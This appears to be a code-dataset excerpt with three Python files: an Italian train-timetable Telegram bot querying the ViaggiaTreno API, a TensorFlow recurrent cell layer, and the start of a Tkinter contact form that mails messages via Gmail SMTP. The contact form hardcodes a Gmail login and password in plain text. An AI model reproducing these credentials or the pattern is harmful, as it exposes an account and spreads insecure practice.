STAZIONEA - STAZIONEB (orario)\n return \"itinerario\"\n\n return \"not found\"\n\n def cercaTreno(id_treno):\n content = \"http://www.viaggiatreno.it/viaggiatrenonew/resteasy/viaggiatreno/cercaNumeroTrenoTrenoAutocomplete/\"+id_treno\n response = urllib.request.urlopen(content)\n id_stazione = (str(response.read()).split(\"-\")[-1][:-3])\n try:\n info = \"http://www.viaggiatreno.it/viaggiatrenonew/resteasy/viaggiatreno/andamentoTreno/\"+id_stazione+\"/\"+id_treno\n response = urllib.request.urlopen(info)\n except: #errore urllib (non trovato)\n logging.debug(\"Treno {} non trovato\".format(id_treno))\n return None, False, 404 #data, success, error\n content = response.read()\n data = json.loads(content.decode(\"utf8\"))\n logging.info(\"Cercato il treno {}\".format(id_treno))\n return data, True, None\n\n def cercaItinerario(stazione1, stazione2, orario):\n if orario != None:\n tempogrezzo = orario\n try:\n tempogrezzo = tempogrezzo + datetime.datetime.now().strftime(' %Y-%m-%d')\n tempo = datetime.datetime.strptime(tempogrezzo, '%H:%M %Y-%m-%d')\n tempo = tempo.strftime('%Y-%m-%dT%H:%M:%S')\n except:\n return None, False, 100 #errore\n elif orario == None:\n tempo = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S')\n\n try:\n content = \"http://www.viaggiatreno.it/viaggiatrenonew/resteasy/viaggiatreno/cercaStazione/\"+stazione1.replace(\" \",\"%20\") #TODO\n response = urllib.request.urlopen(content)\n except: #errore\n return None, False, 405\n content = response.read()\n if content == b'[]':\n return None, False, 405\n data = json.loads(content.decode(\"utf8\"))\n id_stazione1 = (str(data[0]['id'])).split(\"S\")[-1][:9].split(\"N\")[-1][:9]\n\n try:\n content = \"http://www.viaggiatreno.it/viaggiatrenonew/resteasy/viaggiatreno/cercaStazione/\"+stazione2.replace(\" \",\"%20\") #TODO\n response = urllib.request.urlopen(content)\n except:\n return None, False, 406\n content = response.read()\n if content == b'[]':\n return None, False, 406\n data = json.loads(content.decode(\"utf8\"))\n id_stazione2 = (str(data[0]['id'])).split(\"S\")[-1][:9].split(\"N\")[-1][:9]\n\n content = \"http://www.viaggiatreno.it/viaggiatrenonew/resteasy/viaggiatreno/soluzioniViaggioNew/\"+id_stazione1+\"/\"+id_stazione2+\"/\"+tempo\n response = urllib.request.urlopen(content)\n content = response.read()\n data = json.loads(content.decode(\"utf8\"))\n logging.info(\"Itinerario cercato da {} a {} orario {}\".format(stazione1, stazione2, orario))\n return data, True, None\n\n def cercaStatistiche():\n content = \"http://www.viaggiatreno.it/viaggiatrenonew/resteasy/viaggiatreno/statistiche/random\"\n response = urllib.request.urlopen(content)\n content = response.read()\n data = json.loads(content.decode(\"utf8\"))\n logging.info(\"Statistiche cercate\")\n return data, True, None\n\n class stazione:\n def check(stazione):\n stazione = urllib.parse.quote(stazione)\n try:\n content = \"http://www.viaggiatreno.it/viaggiatrenonew/resteasy/viaggiatreno/cercaStazione/\"+stazione.replace(\" \",\"%20\") #soluzione temporanea TODO\n response = urllib.request.urlopen(content)\n except Exception as e:\n logging.info(\"{} non è una stazione\".format(stazione))\n return False, None\n content = response.read()\n if content == b'[]':\n logging.info(\"{} non è una stazione\".format(stazione))\n return False, None\n\n data = json.loads(content.decode(\"utf8\"))\n logging.info(\"{} è una stazione\".format(stazione))\n return True, data\n\n def informazioni(stazione):\n stazione = urllib.parse.quote(stazione)\n try:\n content = \"http://www.viaggiatreno.it/viaggiatrenonew/resteasy/viaggiatreno/cercaStazione/\"+stazione\n response = urllib.request.urlopen(content)\n except:\n return None, False, 404\n content = response.read()\n if content == b'[]':\n return None, False, 404\n data = json.loads(content.decode(\"utf8\"))\n id_stazione = (str(data[0]['id']))\n content = \"http://www.viaggiatreno.it/viaggiatrenonew/resteasy/viaggiatreno/regione/\"+id_stazione\n response = urllib.request.urlopen(content)\n id_regione = response.read()\n content = \"http://www.viaggiatreno.it/viaggiatrenonew/resteasy/viaggiatreno/dettaglioStazione/\"+id_stazione+\"/\"+str(id_regione.decode(\"utf-8\"))\n response = urllib.request.urlopen(content)\n content = response.read()\n data = json.loads(content.decode(\"utf8\"))\n logging.info(\"{} informazioni ottenute\".format(stazione))\n return data\n\n\n def arrivi(stazione):\n stazione = urllib.parse.quote(stazione)\n try:\n content = \"http://www.viaggiatreno.it/viaggiatrenonew/resteasy/viaggiatreno/cercaStazione/\"+stazione\n response = urllib.request.urlopen(content)\n except:\n return None, False, 404\n content = response.read()\n if content == b'[]':\n return None, False, 404\n data = json.loads(content.decode(\"utf8\"))\n id_stazione = (str(data[0]['id']))\n datatempo = datetime.datetime.now().strftime('%a %b %d %Y %H:%M:%S GMT+0100')\n datatempo = datatempo.replace(\" \",\"%20\")\n content = \"http://www.viaggiatreno.it/viaggiatrenonew/resteasy/viaggiatreno/arrivi/\"+id_stazione+\"/\"+datatempo\n response = urllib.request.urlopen(content)\n content = response.read()\n data = json.loads(content.decode(\"utf8\"))\n logging.info(\"{} arrivi ottenuti\".format(stazione))\n return data, True, None\n\n def partenze(stazione):\n stazione = urllib.parse.quote(stazione)\n try:\n content = \"http://www.viaggiatreno.it/viaggiatrenonew/resteasy/viaggiatreno/cercaStazione/\"+stazione\n response = urllib.request.urlopen(content)\n except:\n return None, False, 404\n content = response.read()\n if content == b'[]':\n return None, False, 404\n data = json.loads(content.decode(\"utf8\"))\n id_stazione = (str(data[0]['id']))\n datatempo = datetime.datetime.now().strftime('%a %b %d %Y %H:%M:%S GMT+0100')\n datatempo = datatempo.replace(\" \",\"%20\")\n content = \"http://www.viaggiatreno.it/viaggiatrenonew/resteasy/viaggiatreno/partenze/\"+id_stazione+\"/\"+datatempo\n response = urllib.request.urlopen(content)\n content = response.read()\n data = json.loads(content.decode(\"utf8\"))\n logging.info(\"{} partenze ottenute\".format(stazione))\n return data, True, None\n\nclass Messaggi:\n def erroreDB(message, error):\n message.reply(\"*Errore nel database*\"\n \"\\n_Ci scusiamo per il disagio._\"\n \"\\nInoltra questo messaggio *tecnico* a @MarcoBuster *[DEV]*:\"\n \"`{}`\".format(error))\n logging.error(\"Erorre database: {}\".format(error))\n def treno1(data):\n orarioPartenza = datetime.datetime.fromtimestamp(data['orarioPartenza'] / 1000).strftime('%H:%M')\n orarioArrivo = datetime.datetime.fromtimestamp(data['orarioArrivo'] / 1000).strftime('%H:%M')\n try:\n oraUltimoRilevamento = datetime.datetime.fromtimestamp(data['oraUltimoRilevamento'] / 1000).strftime('%H:%M')\n except TypeError:\n oraUltimoRilevamento = \"Il treno non è ancora partito\"\n n_fermate = 0\n for dict in data['fermate']:\n n_fermate = n_fermate+1\n\n testo = (\"🚅Treno {0} {1}\"\n \"\\n🚉Stazione di partenza: {2} ({3})\"\n \"\\n🚉Stazione di arrivo: {4} ({5})\"\n \"\\n🕒Ritardo: {6}m\"\n \"\\n🚧Stazione ultimo rilevamento: {7} ({8})\"\n \"\\nℹ️Numero di fermate: {9}\"\n .format(data['categoria'], str(data['numeroTreno']), data['origine'], orarioPartenza,\n data['destinazione'], orarioArrivo, str(data['ritardo']), data['stazioneUltimoRilevamento'],\n oraUltimoRilevamento, str(n_fermate)))\n logging.info(\"Formattato treno {}\".format(data['numeroTreno']))\n return testo\n\n def arriviStazione(data, nomestazione):\n messaggio_iniziale = \"Arrivi della stazione di \"+nomestazione+\":\\n\"\n messaggio = \"\"\n for k in range(0,9):\n try:\n data[k]['numeroTreno']\n except IndexError or TypeError:\n break\n sOrarioArrivoP = datetime.datetime.fromtimestamp(data[k]['orarioArrivo'] / 1000).strftime('%H:%M')\n binario = data[k]['binarioProgrammatoArrivoDescrizione']\n if data[k]['inStazione'] == False:\n inStazione = \"No\"\n elif data[k]['inStazione'] == True:\n inStazione = \"Sì\"\n messaggio += (\"🚅Treno {} {}\"\n \"\\n🚉Proveniente da: {}\"\n \"\\n🚧In stazione: {}\"\n \"\\n🕒Ritardo: {}m\"\n \"\\n🕰Arrivo previsto: {}\"\n \"\\n🛤Binario: {}\\n\\n\"\n .format(data[k]['categoria'], data[k]['numeroTreno'], data[k]['origine'], inStazione, data[k]['ritardo'], sOrarioArrivoP, str(binario)))\n if messaggio == None:\n messaggio = \"\\nNon c'è nessun treno in arrivo in questa stazione\"\n testo = messaggio_iniziale + messaggio\n logging.info(\"Formattati arrivi stazione {}\".format(nomestazione))\n return testo\n\n def partenzeStazione(data, nomestazione):\n messaggio_iniziale = \"Partenze della stazione di \"+nomestazione+\":\\n\"\n messaggio = \"\"\n for k in range(0,9):\n try:\n data[k]['numeroTreno']\n except IndexError or TypeError:\n break\n sOrarioPartenzaP = datetime.datetime.fromtimestamp(data[k]['orarioPartenza'] / 1000).strftime('%H:%M')\n binario = data[k]['binarioProgrammatoPartenzaDescrizione']\n if data[k]['inStazione'] == False:\n inStazione = \"No\"\n elif data[k]['inStazione'] == True:\n inStazione = \"Sì\"\n messaggio += (\"🚅Treno {} {}\"\n \"\\n🚉Diretto a: {}\"\n \"\\n🚧In stazione: {}\"\n \"\\n🕒Ritardo: {}m\"\n \"\\n🕰Partenza prevista: {}\"\n \"\\n🛤Binario: {}\\n\\n\"\n .format(data[k]['categoria'], data[k]['numeroTreno'], data[k]['destinazione'], inStazione, data[k]['ritardo'], sOrarioPartenzaP, str(binario)))\n if messaggio == None:\n messaggio = \"\\nNon c'è nessun treno in partenza in questa stazione\"\n testo = messaggio_iniziale + messaggio\n logging.info(\"Formattati arrivi stazione {}\".format(nomestazione))\n return testo\n\n def itinerario(data):\n messaggio = \"Ho trovato questo itinerario da {0} a {1}\".format(data['origine'], data['destinazione'])\n inline_keyboard = '['\n soluzioni = \"\"\n n_soluzioni = 0\n fff = \"\"\n\n for dictionary in data['soluzioni']:\n n_soluzioni += 1\n soluzioni = \"\\n\\n➖➖➖Soluzione {n}\".format(n=n_soluzioni)\n fff += \"\\n\\n\\nSoluzione #{n}\".format(n=n_soluzioni)\n\n n_cambi = -1\n\n for dict in dictionary['vehicles']:\n n_cambi = n_cambi + 1\n fff += \"---Cambio #{n}\".format(n=n_cambi)\n orarioPartenza = datetime.datetime.strptime(dict['orarioPartenza'], '%Y-%m-%dT%H:%M:%S').strftime('%H:%M')\n orarioArrivo = datetime.datetime.strptime(dict['orarioArrivo'], '%Y-%m-%dT%H:%M:%S').strftime('%H:%M')\n\n if n_cambi > 0:\n a_capo = \"\\n🚧Cambio🚧\"\n else:\n a_capo = \"\"\n\n if n_cambi == 0:\n soluzione = soluzioni\n else:\n soluzione = \"\"\n\n messaggio = messaggio + soluzione + a_capo + (\n \"\\n🚅Treno {0} {1}\"\n \"\\n🚉Parte da {2} alle ore {3}\"\n \"\\n🚉Arriva a {4} alle ore {5}\".format(dict['categoriaDescrizione'], str(dict['numeroTreno']), dict['origine'], orarioPartenza, dict['destinazione'], orarioArrivo)\n )\n inline_keyboard = inline_keyboard + '[{\"text\":\"🔍Altre informazioni sul treno '+dict['categoriaDescrizione']+\" \"+str(dict['numeroTreno'])+'\", \"callback_data\": \"agg@'+str(dict['numeroTreno'])+'\"}],'\n\n if n_soluzioni > 4:\n break\n\n inline_keyboard = inline_keyboard + '[{\"text\":\"🔙Torna indietro\", \"callback_data\":\"home\"}]]'\n logging.info(\"Formattato itinerario da {} a {}\".format(data['origine'], data['destinazione']))\n print(messaggio)\n return messaggio, inline_keyboard\n\n def listaStazioni(data):\n numero_dict = 0\n inline_keyboard = '['\n for dict in data:\n numero_dict = numero_dict + 1\n stazione = dict['nomeLungo']\n callback_data = \"staz$\"+dict['nomeLungo']\n inline_keyboard = inline_keyboard + '[{\"text\":\"'+stazione+'\",\"callback_data\":\"'+callback_data+'\"}],'\n\n if numero_dict == 1:\n return 1, None\n\n messaggio = \"Ho trovato {} stazioni con quel nome:\".format(numero_dict)\n inline_keyboard = inline_keyboard + '[{\"text\":\"🔙Torna indietro\",\"callback_data\":\"home\"}]]'\n logging.info(\"Formattata lista stazioni\")\n return messaggio, inline_keyboard\n\n def fermata(data, numeroFermata):\n id_treno = data['numeroTreno']\n cat_treno = data['categoria']\n data = data['fermate'][int(numeroFermata)]\n\n Arrivo = None\n Partenza = None\n\n tipoFermata = data['tipoFermata'].replace(\"P\", \"stazione di partenza\").replace(\"A\", \"stazione di destinazione\").replace(\"F\", \"fermata intermedia\")\n\n if data['tipoFermata'] == \"P\" and data['actualFermataType'] == 0: #Stazione di partenza del treno, non è ancora partito.\n orarioPartenzaTeorica = datetime.datetime.fromtimestamp(data['partenza_teorica'] / 1000).strftime('%H:%M')\n Partenza = \"ℹ️Il treno è previsto in partenza alle ore {0} al binario {1}\".format(orarioPartenzaTeorica, data['binarioProgrammatoPartenzaDescrizione'].strip())\n Arrivo = \"\"\n\n if data['tipoFermata'] == \"P\" and data['actualFermataType'] != 0:\n orarioPartenzaTeorica = datetime.datetime.fromtimestamp(data['partenza_teorica'] / 1000).strftime('%H:%M')\n orarioPartenzaEffettiva = datetime.datetime.fromtimestamp(data['partenzaReale'] / 1000).strftime('%H:%M')\n ritardoPartenza = data['ritardoPartenza']\n\n if ritardoPartenza == 1:\n ritardoPartenza = \"con un ritardo di 1 minuto\"\n emoji = \"👍\"\n elif ritardoPartenza == -1:\n ritardoPartenza = \"in anticipo di 1 minuto\"\n emoji = \"👍\"\n elif ritardoPartenza > 1:\n ritardoPartenza = \"con un ritardo di {} minuti\".format(str(ritardoPartenza))\n emoji = \"❗️\"\n elif ritardoPartenza < 1:\n ritardoPartenza = \"in anticipo di {} minuti\".format(str(abs(ritardoPartenza)))\n emoji = \"⁉️\"\n if data['ritardoPartenza'] == 0:\n ritardoPartenza = \"in perfetto orario\"\n emoji = \"👌\"\n\n if data['binarioEffettivoPartenzaDescrizione'] == None:\n binario = data['binarioProgrammatoPartenzaDescrizione'].strip()\n else:\n binario = data['binarioEffettivoPartenzaDescrizione'].strip()\n Partenza = \"{3}Il treno è partito dal binario {0} alle ore {1} {2}\".format(binario, orarioPartenzaEffettiva, ritardoPartenza, emoji)\n Arrivo = \"\"\n\n if data['tipoFermata'] == \"F\" and data['actualFermataType'] != 0: #il treno è arrivato in stazione e forse è anche partito. fermata INTERMEDIA\n orarioArrivoProgrammato = datetime.datetime.fromtimestamp(data['arrivo_teorico'] / 1000).strftime('%H:%M')\n orarioPartenzaProgrammato = datetime.datetime.fromtimestamp(data['partenza_teorica'] / 1000).strftime('%H:%M')\n if data['ritardoArrivo'] == 0:\n orarioArrivoEffettivo = orarioArrivoProgrammato\n else:\n orarioArrivoEffettivo = datetime.datetime.fromtimestamp(data['arrivoReale'] / 1000).strftime('%H:%M')\n if data['ritardoPartenza'] == 0:\n orarioPartenzaEffettiva = orarioPartenzaProgrammato\n else:\n orarioPartenzaEffettiva = datetime.datetime.fromtimestamp(data['partenzaReale'] / 1000).strftime('%H:%M')\n ritardoArrivo = data['ritardoArrivo']\n ritardoPartenza = data['ritardoPartenza']\n if data['partenzaReale'] == None: #ergo il treno non è ancora partito ed è fermo in stazione\n if ritardoArrivo == 1:\n ritardoArrivo = \"con un ritardo di 1 minuto\"\n emoji = \"👍\"\n elif ritardoArrivo == -1:\n ritardoArrivo = \"in anticipo di 1 minuto\"\n emoji = \"👍\"\n elif ritardoArrivo > 1:\n ritardoArrivo = \"con un ritardo di {} minuti\".format(str(ritardoArrivo))\n emoji = \"❗️\"\n elif ritardoArrivo < 1:\n ritardoArrivo = \"in anticipo di {} minuti\".format(str(abs(ritardoArrivo)))\n emoji = \"⁉️\"\n\n if data['ritardoArrivo'] == 0:\n ritardoArrivo = \"in perfetto orario\"\n emoji = \"👌\"\n\n if data['binarioEffettivoArrivoDescrizione'] == None:\n binario = data['binarioProgrammatoArrivoDescrizione'].strip()\n else:\n binario = data['binarioEffettivoArrivoDescrizione'].strip()\n Arrivo = \"{3}Il treno è arrivato al binario {0} alle ore {1} {2}\".format(binario, orarioArrivoEffettivo, ritardoArrivo, emoji)\n\n if data['binarioEffettivoPartenzaDescrizione'] == None:\n binario = data['binarioProgrammatoPartenzaDescrizione'].strip()\n else:\n binario = data['binarioEffettivoPartenzaDescrizione'].strip()\n Partenza = \"▶️Il treno partirà dal binario {0} alle ore {1}\".format(binario, orarioPartenzaProgrammato)\n else:\n if ritardoArrivo == 1:\n ritardoArrivo = \"con un ritardo di 1 minuto\"\n emoji = \"👍\"\n elif ritardoArrivo == -1:\n ritardoArrivo = \"in anticipo di 1 minuto\"\n emoji = \"👍\"\n elif ritardoArrivo > 1:\n ritardoArrivo = \"con un ritardo di {} minuti\".format(str(ritardoArrivo))\n emoji = \"❗️\"\n elif ritardoArrivo < 1:\n ritardoArrivo = \"in anticipo di {} minuti\".format(str(abs(ritardoArrivo)))\n emoji = \"⁉️\"\n if data['ritardoArrivo'] == 0:\n ritardoArrivo = \"in perfetto orario\"\n emoji = \"👌\"\n\n if data['binarioEffettivoArrivoDescrizione'] == None:\n binario = data['binarioProgrammatoArrivoDescrizione'].strip()\n else:\n binario = data['binarioEffettivoArrivoDescrizione'].strip()\n Arrivo = \"{3}Il treno è arrivato al binario {0} alle ore {1} {2}\".format(binario, orarioArrivoEffettivo, ritardoArrivo, emoji)\n if ritardoPartenza == 1:\n ritardoPartenza = \"con un ritardo di 1 minuto\"\n emoji = \"👍\"\n elif ritardoPartenza == -1:\n ritardoPartenza = \"in anticipo di 1 minuto\"\n emoji = \"👍\"\n elif ritardoPartenza > 1:\n ritardoPartenza = \"con un ritardo di {} minuti\".format(str(ritardoPartenza))\n emoji = \"❗️\"\n elif ritardoPartenza < 1:\n ritardoPartenza = \"in anticipo di {} minuti\".format(str(abs(ritardoPartenza)))\n emoji = \"⁉️\"\n if data['ritardoPartenza'] == 0:\n ritardoPartenza = \"in perfetto orario\"\n emoji = \"👌\"\n\n if data['binarioEffettivoPartenzaDescrizione'] == None:\n binario = data['binarioProgrammatoPartenzaDescrizione'].strip()\n else:\n binario = data['binarioEffettivoPartenzaDescrizione'].strip()\n Partenza = \"{3}Il treno è partito dal binario {0} alle ore {1} {2}\".format(binario, orarioPartenzaEffettiva, ritardoPartenza, emoji)\n\n if data['tipoFermata'] == \"F\" and data['actualFermataType'] == 0: #Il treno non è ancora arrivato alla stazione INTERMEDIA x\n orarioArrivoTeorica = datetime.datetime.fromtimestamp(data['arrivo_teorico'] / 1000).strftime('%H:%M')\n Arrivo = \"ℹ️Il treno è previsto in arrivo alle ore {0} al binario {1}\".format(orarioArrivoTeorica, data['binarioProgrammatoArrivoDescrizione'])\n orarioPartenzaTeorica = datetime.datetime.fromtimestamp(data['partenza_teorica'] / 1000).strftime('%H:%M')\n Partenza = \"ℹ️Il treno è previsto in partenza alle ore {0} al binario {1}\".format(orarioPartenzaTeorica, data['binarioProgrammatoPartenzaDescrizione'])\n\n\n if data['tipoFermata'] == \"A\" and data['actualFermataType'] != 0: #Il treno è arrivato alla stazione di arrivo finale x\n orarioArrivoTeorica = datetime.datetime.fromtimestamp(data['arrivo_teorico'] / 1000).strftime('%H:%M')\n if data['ritardoArrivo'] == 0:\n orarioArrivoEffettiva = orarioArrivoTeorica\n else:\n orarioArrivoEffettiva = datetime.datetime.fromtimestamp(data['arrivoReale'] / 1000).strftime('%H:%M')\n ritardoArrivo = data['ritardoArrivo']\n if ritardoArrivo == 1:\n ritardoArrivo = \"con un ritardo di 1 minuto\"\n emoji = \"👍\"\n elif ritardoArrivo == -1:\n ritardoArrivo = \"in anticipo di 1 minuto\"\n emoji = \"👍\"\n elif ritardoArrivo > 1:\n ritardoArrivo = \"con un ritardo di {} minuti\".format(str(ritardoArrivo))\n emoji = \"❗️\"\n elif ritardoArrivo < 1:\n ritardoArrivo = \"in anticipo di {} minuti\".format(str(abs(ritardoArrivo)))\n emoji = \"⁉️\"\n\n if data['ritardoArrivo'] == 0:\n ritardoArrivo = \"in perfetto orario\"\n emoji = \"👌\"\n\n if data['binarioEffettivoArrivoDescrizione'] == None and data['binarioProgrammatoArrivoDescrizione'] == None:\n binario = \"?\"\n elif data['binarioEffettivoArrivoDescrizione'] == None:\n binario = data['binarioProgrammatoArrivoDescrizione'].strip()\n else:\n binario = data['binarioEffettivoArrivoDescrizione'].strip()\n Arrivo = \"{3}Il treno è partito dal binario {0} alle ore {1} {2}\".format(data['binarioEffettivoArrivoDescrizione'], orarioArrivoEffettiva, ritardoArrivo, emoji)\n Partenza = \"\"\n\n if data['tipoFermata'] == \"A\" and data['actualFermataType'] == 0:\n orarioArrivoTeorica = datetime.datetime.fromtimestamp(data['arrivo_teorico'] / 1000).strftime('%H:%M')\n Arrivo = \"ℹ️Il treno è previsto in arrivo alle ore {0} al binario {1}\".format(orarioArrivoTeorica, data['binarioProgrammatoArrivoDescrizione'].strip())\n Partenza = \"\"\n\n actualFermataType = data['actualFermataType']\n if actualFermataType == 0 or actualFermataType == 1:\n actualFermataType = \"\"\n elif actualFermataType == 2:\n actualFermataType = \"\\n❗️Fermata non prevista\"\n elif actualFermataType == 3:\n actualFermataType = \"\\n‼️Fermata soppressa\"\n\n ritardoArrivo, ritardoPartenza = data['ritardoArrivo'], data['ritardoPartenza']\n\n if Arrivo == None and Partenza == None and data['actualFermataType'] == 0:\n messaggio = (\"Errore sconosciuto\"\n \"\\nUn errore delle ferrovie dello Stato o del bot?\"\n \"\\nNel dubbio, inoltra questo messaggio allo sviluppatore (@MarcoBuster) o esegui il comando /feedback\"\n \"\\nNumero treno: {0}\"\n \"\\nID stazione: {1}\"\n \"\\nInformazioni dell'arrivo: None\"\n \"\\nInformazioni di partenza: None\"\n \"\\nactualFermataType: {2}\"\n \"\\n\\nNon arrabiarti con lo sviluppatore o lasciare recensioni negative, tu non immagini nemmeno quante variabili ci sono in ballo e quanto i dati di Trenitalia siano sballati a volte😢\" #A sad but true story\n \"\\nGuarda il codice su GitHub, se non ci credi: www.github.com/MarcoBuster/OrarioTreniBot.\".format(str(id_treno), str(numeroFermata), str(data['actualFermataType']))\n )\n logging.error(\"Formattazione fermata id treno: {}, numero fermata: {}, actualFermataType: {}\".format(id_treno, numeroFermata, actualFermataType))\n return messaggio\n\n if Arrivo == None and Partenza == None:\n messaggio = (\n \"ℹ️Informazioni del treno {0} {1} rispetto alla fermata {2}\\n\".format(cat_treno, id_treno, data['stazione'])\n +actualFermataType\n )\n logging.info(\"Formattazione fermata {} treno {} \".format(numeroFermata, id_treno))\n return messaggio\n else:\n messaggio = (\n \"ℹ️Informazioni del treno {0} {1} rispetto alla fermata {2}\\n\".format(cat_treno, id_treno, data['stazione'])\n +Arrivo+ (\"\\n\" if Arrivo != \"\" else \"\")\n +Partenza+ (\"\\n\" if Partenza != \"\" else \"\")\n +actualFermataType\n )\n logging.info(\"Formattazione fermata {} treno {} \".format(numeroFermata, id_treno))\n return messaggio\n\n def grafico(data, id_treno):\n fermate = []\n ritardi = []\n\n for dictionary in data['fermate']:\n if dictionary['actualFermataType'] == 0:\n break\n\n fermate = fermate + [dictionary['stazione']]\n ritardi = ritardi + [dictionary['ritardo']]\n\n if len(fermate) < 2 or len(ritardi) < 2:\n return False\n\n line = go.Scatter(\n x = fermate,\n y = ritardi,\n name = 'Ritardo',\n line = dict(\n color = ('rgb(205, 12, 24)'),\n width = 4,\n shape = 'spline')\n )\n\n title = 'Ritardo del treno {id_treno} • @OrarioTreniBot'.format(id_treno=id_treno)\n layout = dict(title = title,\n xaxis = dict(title = 'Fermata'),\n yaxis = dict(title = 'Ritardo (minuti)'),\n )\n\n filename = os.getcwd() + \"/ritardo_treno@{id_treno}.png\".format(id_treno=id_treno)\n fig = dict(data=[line], layout=layout)\n py.image.save_as(fig, filename=filename)\n return filename\n\n def statistiche(data):\n messaggio = (\"Statistiche dei treni circolanti:\"\n \"\\n🚅Treni oggi: {}\"\n \"\\n🚅Treni circolanti in questo momento: {}\"\n \"\\n✅Versione del bot: 3.1\".format(str(data['treniGiorno']), str(data['treniCircolanti'])))\n logging.info(\"Formattazione statistiche\")\n return messaggio\n","sub_path":"API.py","file_name":"API.py","file_ext":"py","file_size_in_byte":34023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"1001916","text":"import tensorflow as tf\nfrom .. import CustomLayer\n\nclass NeuromodulatedBistableRecurrentCellLayer(CustomLayer.CustomLayer):\n def __init__(self, output_dim, model, var_list = None, **kwargs):\n self.output_dim = output_dim\n self.state_size = output_dim\n super(NeuromodulatedBistableRecurrentCellLayer, self).__init__(output_dim, model, var_list, **kwargs)\n\n def build(self, input_shape):\n self.kernelz = self.add_weight(name=\"kz\", shape=(input_shape[1], self.output_dim), dtype=tf.float32,\n initializer='glorot_uniform')\n self.kernelr = self.add_weight(name=\"kr\", shape=(input_shape[1], self.output_dim), dtype=tf.float32,\n initializer='glorot_uniform')\n self.kernelh = self.add_weight(name=\"kh\", shape=(input_shape[1], self.output_dim), dtype=tf.float32,\n initializer='glorot_uniform')\n\n self.memoryz = self.add_weight(name=\"mz\", shape=(self.output_dim, self.output_dim), dtype=tf.float32,\n initializer='orthogonal')\n self.memoryr = self.add_weight(name=\"mr\", shape=(self.output_dim, self.output_dim), dtype=tf.float32,\n initializer='orthogonal')\n\n self.br = self.add_weight(name=\"br\", shape=(self.output_dim,), dtype = tf.float32, initializer='zeros')\n self.bz = self.add_weight(name=\"bz\", shape=(self.output_dim,), dtype = tf.float32, initializer='zeros')\n\n super(NeuromodulatedBistableRecurrentCellLayer, self).build(input_shape)\n\n def call(self, input, states):\n inp = input\n prev_out = states[0]\n z = tf.nn.sigmoid(tf.matmul(inp, self.kernelz) + tf.matmul(prev_out, self.memoryz) + self.bz)\n r = tf.nn.tanh(tf.matmul(inp, self.kernelr) + tf.matmul(prev_out, self.memoryr) + self.br)+1\n h = tf.nn.tanh(tf.matmul(inp, self.kernelh) + r * prev_out)\n output = (1.0 - z) * h + z * prev_out\n return output, [output]\n\n def get_initial_state(self, inputs=None, batch_size=None, dtype=tf.float32):\n return [tf.zeros(shape=(batch_size, self.output_dim), dtype=dtype)]","sub_path":"NetworkConstruction/CustomLayers/NeuromodulatedBistableRecurrentCellLayer.py","file_name":"NeuromodulatedBistableRecurrentCellLayer.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"201675073","text":"import math\nimport smtplib\nimport ssl\nfrom tkinter import *\nfrom tkinter import font as tkFont\nfrom tkinter import messagebox\nfrom email.mime.text import MIMEText\n\nclass ContactUs:\n def __init__(self, mainClass, backEnd):\n print(\" Entering Parent - Contact Us screen - /parent/frontEnd/dashboard/pages/contactUs.py\")\n\n def saveButtonClick():\n string = '\\n\\n\\n' + self.messageEntry.get(1.0, 'end-1c') + '\\n\\n\\nParent Name: ' + self.firstNameEntry.get() + ' ' + self.lastNameEntry.get() + '\\nParent Email: ' + self.emailEntry.get() + '\\nParent Phone #: ' + self.phoneNumberEntry.get() \n msg = MIMEText(string, 'plain')\n msg['Subject'] = 'Message from littleLEARNERs Parent: ' + self.firstNameEntry.get() + ' ' + self.lastNameEntry.get()\n\n #login\n port = 465\n my_mail = 'littlelearners411@gmail.com'\n my_password = '!!littleLEARNERS!!'\n context = ssl.create_default_context()\n with smtplib.SMTP_SSL('smtp.gmail.com', port, context=context) as server:\n server.login(my_mail, my_password)\n server.sendmail(self.emailEntry.get(), my_mail, msg.as_string())\n\n \n \n \n def displayContactUs(): \n # pageTitle = Label(mainClass.rightFrame, font=('arial', 70, 'bold'), text=\"About\", background=\"white\")\n # pageTitle.pack() \n # backend init\n # backEnd.init()\n\n mainClass.rightFrame.update_idletasks() # Calls all pending idle tasks to get frame sizes\n self.rightFrameWidth = mainClass.rightFrame.winfo_width()\n self.rightFrameHeight = mainClass.rightFrame.winfo_height()\n \n # account information frame (left)\n self.aboutInformationFrame = Frame(mainClass.rightFrame, width=self.rightFrameWidth*0.7, height=self.rightFrameHeight - 100, bd=1, relief=\"groove\") \n self.aboutInformationFrame.configure(background='white')\n self.aboutInformationFrame.pack(side=LEFT, fill=BOTH, padx=(20), pady=(30))\n self.aboutInformationFrame.pack_propagate(0)\n\n self.manageAccountTitle = Label(self.aboutInformationFrame, text=\"Contact Us\", background=\"white\", font=\"bold\")\n self.manageAccountTitle.pack()\n\n self.aboutInformationEntriesFrame = Frame(self.aboutInformationFrame, height=self.rightFrameHeight - 100, bd=0, relief=\"groove\") \n self.aboutInformationEntriesFrame.configure(background='white')\n self.aboutInformationEntriesFrame.pack(side=LEFT, fill=BOTH, padx=(20), pady=(30))\n self.aboutInformationEntriesFrame.pack_propagate(0)\n\n #Email\n self.emailLabel = Label(self.aboutInformationEntriesFrame, text=\"Email: \", background=\"white\", font=\"bold\")\n self.emailLabel.grid(row=1,column=0, sticky=W)\n self.emailEntry = Entry(self.aboutInformationEntriesFrame, width=30)\n self.emailEntry.grid(row=1,column=1, padx=(20, 0), pady=10)\n\n #First Name\n self.firstNameLabel = Label(self.aboutInformationEntriesFrame, text=\"First Name: \", background=\"white\", font=\"bold\")\n self.firstNameLabel.grid(row=2,column=0, sticky=W)\n self.firstNameEntry = Entry(self.aboutInformationEntriesFrame, width=30)\n self.firstNameEntry.grid(row=2,column=1, padx=(20, 0), pady=10)\n \n #Last Name\n self.lastNameLabel = Label(self.aboutInformationEntriesFrame, text=\"Last Name: \", background=\"white\", font=\"bold\")\n self.lastNameLabel.grid(row=3,column=0, sticky=W)\n self.lastNameEntry = Entry(self.aboutInformationEntriesFrame, width=30)\n self.lastNameEntry.grid(row=3,column=1, padx=(20, 0), pady=10)\n\n #Phone Number\n self.phoneNumberLabel = Label(self.aboutInformationEntriesFrame, text=\"Phone Number: \", background=\"white\", font=\"bold\")\n self.phoneNumberLabel.grid(row=4,column=0, sticky=W)\n self.phoneNumberEntry = Entry(self.aboutInformationEntriesFrame, width=30)\n 